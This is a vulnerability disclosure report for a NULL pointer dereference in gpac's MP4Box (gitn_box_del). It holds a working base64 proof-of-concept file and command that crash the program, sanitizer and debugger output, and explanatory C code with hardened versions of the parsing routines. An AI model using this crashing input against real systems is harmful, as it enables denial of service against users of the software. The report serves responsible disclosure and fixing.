NULL Pointer Dereference in gpac/gpac
Valid
Reported on
Jan 31st 2022
Description
Null Pointer Dereference in gitn_box_del
Proof of Concept
echo -n AAAAEW1ldGEwMDAwMDAwMDAAAABjMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAAAAARZ2l0bjAwMDAwMDAwMA== | base64 -d > poc
./MP4Box -bt ./poc
Sanitizer output:
AddressSanitizer:DEADLYSIGNAL
=================================================================
==6791==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000008 (pc 0x7f32f604f350 bp 0x606000000380 sp 0x7ffec6197280 T0)
==6791==The signal is caused by a READ memory access.
==6791==Hint: address points to the zero page.
#0 0x7f32f604f350 in gitn_box_del (/home/presler/fuzzing/gpac/bin/gcc/libgpac.so.10+0x1cc350)
#1 0x7f32f606c54d in gf_isom_box_del (/home/presler/fuzzing/gpac/bin/gcc/libgpac.so.10+0x1e954d)
#2 0x7f32f606c32e in gf_isom_box_parse_ex (/home/presler/fuzzing/gpac/bin/gcc/libgpac.so.10+0x1e932e)
#3 0x7f32f606baab in gf_isom_parse_root_box (/home/presler/fuzzing/gpac/bin/gcc/libgpac.so.10+0x1e8aab)
#4 0x7f32f60747bd in gf_isom_parse_movie_boxes (/home/presler/fuzzing/gpac/bin/gcc/libgpac.so.10+0x1f17bd)
#5 0x7f32f6075ca5 in gf_isom_open_file (/home/presler/fuzzing/gpac/bin/gcc/libgpac.so.10+0x1f2ca5)
#6 0x4de8fd in mp4boxMain (/home/presler/fuzzing/gpac/bin/gcc/MP4Box+0x4de8fd)
#7 0x7f32f5afc0b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
#8 0x429b2d in _start (/home/presler/fuzzing/gpac/bin/gcc/MP4Box+0x429b2d)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV (/home/presler/fuzzing/gpac/bin/gcc/libgpac.so.10+0x1cc350) in gitn_box_del
==6791==ABORTING
gdb output
gdb ./MP4Box -q
Reading symbols from ./MP4Box...
pwndbg> r -bt ./poc
Starting program: /home/presler/fuzzing/gpac_pure/bin/gcc/MP4Box -bt ./poc
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
[iso file] Box "meta" (start 0) has 5 extra bytes
[iso file] Unknown top-level box type 0000
Program received signal SIGSEGV, Segmentation fault.
0x00007ffff7936e3f in gitn_box_del () from /home/presler/fuzzing/gpac_pure/bin/gcc/libgpac.so.10
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
─────────────────────────────────────────────[ REGISTERS ]──────────────────────────────────────────────
RAX 0x0
RBX 0x0
RCX 0x10000100
RDX 0x3030
RDI 0x5555555d22f0 ◂— 0x6769746e /* 'ntig' */
RSI 0x7ffff7df51ba ◂— 'no-check'
R8 0x0
R9 0x0
R10 0x7ffff7748e42 ◂— 'gf_isom_box_del'
R11 0x7ffff7955d40 (gf_isom_box_del) ◂— endbr64
R12 0x0
R13 0x6769746e
R14 0x5555555d22f0 ◂— 0x6769746e /* 'ntig' */
R15 0xffffffec
RBP 0x5555555d22f0 ◂— 0x6769746e /* 'ntig' */
RSP 0x7fffffff7d40 —▸ 0x5555555d22f0 ◂— 0x6769746e /* 'ntig' */
RIP 0x7ffff7936e3f (gitn_box_del+47) ◂— mov rdi, qword ptr [r8 + rax + 8]
───────────────────────────────────────────────[ DISASM ]───────────────────────────────────────────────
► 0x7ffff7936e3f <gitn_box_del+47> mov rdi, qword ptr [r8 + rax + 8]
0x7ffff7936e44 <gitn_box_del+52> test rdi, rdi
0x7ffff7936e47 <gitn_box_del+55> je gitn_box_del+112 <gitn_box_del+112>
↓
0x7ffff7936e80 <gitn_box_del+112> add rbx, 1
0x7ffff7936e84 <gitn_box_del+116> movzx eax, dx
0x7ffff7936e87 <gitn_box_del+119> cmp eax, ebx
0x7ffff7936e89 <gitn_box_del+121> ja gitn_box_del+40 <gitn_box_del+40>
↓
0x7ffff7936e38 <gitn_box_del+40> mov rax, rbx
0x7ffff7936e3b <gitn_box_del+43> shl rax, 4
0x7ffff7936e3f <gitn_box_del+47> mov rdi, qword ptr [r8 + rax + 8]
0x7ffff7936e44 <gitn_box_del+52> test rdi, rdi
───────────────────────────────────────────────[ STACK ]────────────────────────────────────────────────
00:0000│ rsp 0x7fffffff7d40 —▸ 0x5555555d22f0 ◂— 0x6769746e /* 'ntig' */
01:0008│ 0x7fffffff7d48 —▸ 0x7fffffff7ec0 ◂— 0x0
02:0010│ 0x7fffffff7d50 —▸ 0x5555555d22f0 ◂— 0x6769746e /* 'ntig' */
03:0018│ 0x7fffffff7d58 —▸ 0x7ffff7955d6c (gf_isom_box_del+44) ◂— test r12, r12
04:0020│ 0x7fffffff7d60 —▸ 0x7fffffff7ec0 ◂— 0x0
05:0028│ 0x7fffffff7d68 —▸ 0x5555555ca500 —▸ 0x5555555c92e0 ◂— 0xfbad2498
06:0030│ 0x7fffffff7d70 ◂— 0x11
07:0038│ 0x7fffffff7d78 —▸ 0x7ffff7956570 (gf_isom_box_parse_ex+1888) ◂— cmp qword ptr [rsp + 8], 0
─────────────────────────────────────────────[ BACKTRACE ]──────────────────────────────────────────────
► f 0 0x7ffff7936e3f gitn_box_del+47
f 1 0x7ffff7955d6c gf_isom_box_del+44
f 2 0x7ffff7956570 gf_isom_box_parse_ex+1888
f 3 0x7ffff7956a30 gf_isom_parse_root_box+64
f 4 0x7ffff795f17c gf_isom_parse_movie_boxes_internal+236
f 5 0x7ffff7960907 gf_isom_open_file+311
f 6 0x55555557f614 mp4boxMain+19444
f 7 0x7ffff75470b3 __libc_start_main+243
────────────────────────────────────────────────────────────────────────────────────────────────────────
pwndbg> bt
#0 0x00007ffff7936e3f in gitn_box_del () from /home/presler/fuzzing/gpac_pure/bin/gcc/libgpac.so.10
#1 0x00007ffff7955d6c in gf_isom_box_del () from /home/presler/fuzzing/gpac_pure/bin/gcc/libgpac.so.10
#2 0x00007ffff7956570 in gf_isom_box_parse_ex () from /home/presler/fuzzing/gpac_pure/bin/gcc/libgpac.so.10
#3 0x00007ffff7956a30 in gf_isom_parse_root_box () from /home/presler/fuzzing/gpac_pure/bin/gcc/libgpac.so.10
#4 0x00007ffff795f17c in gf_isom_parse_movie_boxes_internal () from /home/presler/fuzzing/gpac_pure/bin/gcc/libgpac.so.10
#5 0x00007ffff7960907 in gf_isom_open_file () from /home/presler/fuzzing/gpac_pure/bin/gcc/libgpac.so.10
#6 0x000055555557f614 in mp4boxMain ()
#7 0x00007ffff75470b3 in __libc_start_main (main=0x55555556d500 <main>, argc=3, argv=0x7fffffffdd08, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffdcf8) at ../csu/libc-start.c:308
#8 0x000055555556d53e in _start ()
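Reading the gdb state above (an inference added here, not part of the reporter's analysis): the faulting instruction indexes an entry array through R8, which is 0, RBX is the loop counter at 0, and the loop bound taken from DX is 0x3030, the two ASCII '0' bytes that sit where the PoC's 17-byte gitn box carries its 16-bit entry count; with nothing left in the box to fill those entries, the read fails, the parser tears the box down, and the destructor walks a NULL array, which puts the first read at address 0x8. The model below is an added example, not gpac's own code: it reproduces that shape in miniature with a read routine that commits the count before the array exists, next to a read and a destructor that tolerate the truncated input. The struct layout, function names and the entry format (u32 group id plus a NUL-terminated name) are assumptions for illustration only.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Illustrative model of a "gitn"-style full box (assumption, not gpac's layout):
 * payload = 4 bytes version/flags, u16 entry count, then entries of
 * { u32 group_id; NUL-terminated name }. On LP64 sizeof(gitn_entry_t) is 16
 * and `name` sits at offset 8, the same arithmetic as [r8 + rax + 8] above. */
typedef struct { uint32_t group_id; char *name; } gitn_entry_t;
typedef struct { uint16_t nb_entries; gitn_entry_t *entries; } gitn_box_t;

/* Constructed from the report's PoC: the 9 payload bytes of its gitn box are
 * nine '0' characters, so the count field reads 0x3030 = 12336 while only
 * 3 bytes remain for entries. */
static const uint8_t POC_PAYLOAD[9] = { '0','0','0','0','0','0','0','0','0' };
/* Constructed well-formed payload: one entry, group_id 7, name "a". */
static const uint8_t GOOD_PAYLOAD[12] = { 0,0,0,0, 0x00,0x01, 0,0,0,7, 'a',0 };

static uint16_t be16(const uint8_t *p) { return (uint16_t)((p[0] << 8) | p[1]); }
static uint32_t be32(const uint8_t *p) {
    return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) | ((uint32_t)p[2] << 8) | p[3];
}

static void free_entries(gitn_entry_t *e, size_t n) {
    if (!e) return;
    for (size_t i = 0; i < n; i++) free(e[i].name);
    free(e);
}

/* Parse `count` entries into a fresh array: 0 and *out set on success;
 * -1 on truncation, with everything built so far freed and *out untouched. */
static int parse_entries(const uint8_t *p, size_t len, uint16_t count, gitn_entry_t **out) {
    gitn_entry_t *e = calloc(count ? count : 1, sizeof *e);
    if (!e) return -1;
    for (uint16_t i = 0; i < count; i++) {
        const uint8_t *nul = (len >= 5) ? memchr(p + 4, 0, len - 4) : NULL;
        if (!nul) { free_entries(e, i); return -1; }   /* truncated entry */
        size_t n = (size_t)(nul - (p + 4));
        e[i].group_id = be32(p);
        e[i].name = malloc(n + 1);
        if (!e[i].name) { free_entries(e, i); return -1; }
        memcpy(e[i].name, p + 4, n + 1);
        p += 4 + n + 1; len -= 4 + n + 1;
    }
    *out = e;
    return 0;
}

/* Pattern behind the report: the count is stored in the box before the entry
 * array exists, so the early error return leaves nb_entries = 0x3030 and
 * entries = NULL for the destructor to walk. */
int gitn_read_unsafe(gitn_box_t *box, const uint8_t *p, size_t len) {
    if (len < 6) return -1;
    box->nb_entries = be16(p + 4);
    return parse_entries(p + 6, len - 6, box->nb_entries, &box->entries);
}

/* Destructor with the crashing shape: with entries == NULL, iteration 0 reads
 * NULL + 0*16 + 8, i.e. address 0x8. Shown for contrast; never call it on a
 * box whose read failed. */
void gitn_del_unsafe(gitn_box_t *box) {
    for (uint16_t i = 0; i < box->nb_entries; i++) free(box->entries[i].name);
    free(box->entries);
}

/* Hardened read: publish the count only once the array is fully built. */
int gitn_read_safe(gitn_box_t *box, const uint8_t *p, size_t len) {
    gitn_entry_t *e = NULL;
    if (len < 6) return -1;
    uint16_t count = be16(p + 4);
    if (parse_entries(p + 6, len - 6, count, &e) < 0) return -1;
    box->entries = e;
    box->nb_entries = count;
    return 0;
}

/* Hardened destructor: tolerate a half-initialised box (defence in depth,
 * so the fix does not rely on every reader being correct). */
void gitn_del_safe(gitn_box_t *box) {
    free_entries(box->entries, box->entries ? box->nb_entries : 0);
    box->entries = NULL;
    box->nb_entries = 0;
}

/* Invariant check: a non-zero count with no backing array is exactly the
 * state the unsafe destructor dereferences. */
int del_would_fault(const gitn_box_t *box) {
    return box->nb_entries > 0 && box->entries == NULL;
}

int main(void) {
    gitn_box_t a = {0}, b = {0};
    int rc_a = gitn_read_unsafe(&a, POC_PAYLOAD, sizeof POC_PAYLOAD);
    printf("unsafe read: rc=%d count=%u entries=%p fault=%d\n",
           rc_a, a.nb_entries, (void *)a.entries, del_would_fault(&a));
    int rc_b = gitn_read_safe(&b, POC_PAYLOAD, sizeof POC_PAYLOAD);
    printf("safe read:   rc=%d count=%u entries=%p fault=%d\n",
           rc_b, b.nb_entries, (void *)b.entries, del_would_fault(&b));
    gitn_del_safe(&a);   /* safe even on the half-initialised box */
    gitn_del_safe(&b);
    return 0;
}
```

The `del_would_fault` predicate is the useful takeaway for a reviewer of any box parser with the same structure: a count field and an array pointer must move together, and the teardown path has to be correct for every state an error return can leave behind, not only the fully-parsed one.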
Impact
This vulnerability is capable of crashing software, so I think this can be described as DoS.
References
We are processing your report and will contact the gpac team within 24 hours.
a year ago
We have contacted a member of the gpac team and are waiting to hear back
a year ago
@maintainer - the researcher has requested a CVE for this report. Are you happy for us to go ahead and assign a CVE to this report?